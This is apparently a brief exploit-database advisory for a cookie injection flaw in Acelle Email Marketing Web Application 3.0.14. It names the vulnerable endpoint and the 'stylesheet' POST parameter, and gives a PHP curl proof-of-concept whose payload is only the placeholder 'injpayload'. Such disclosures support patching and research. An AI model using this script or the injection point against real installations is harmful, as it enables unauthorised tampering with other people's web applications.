Acelle Email Marketing Web Application

2018.02.09

wazehell (TR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#Cookie Injection
#Version : 3.0.14
#url : http://host/general.php 
#POST parameter : stylesheet
######################################
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://host/general.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "stylesheet=injpayload");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
######################################
by : wazehell

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Acelle Email Marketing Web Application

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Acelle Email Marketing Web Application

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.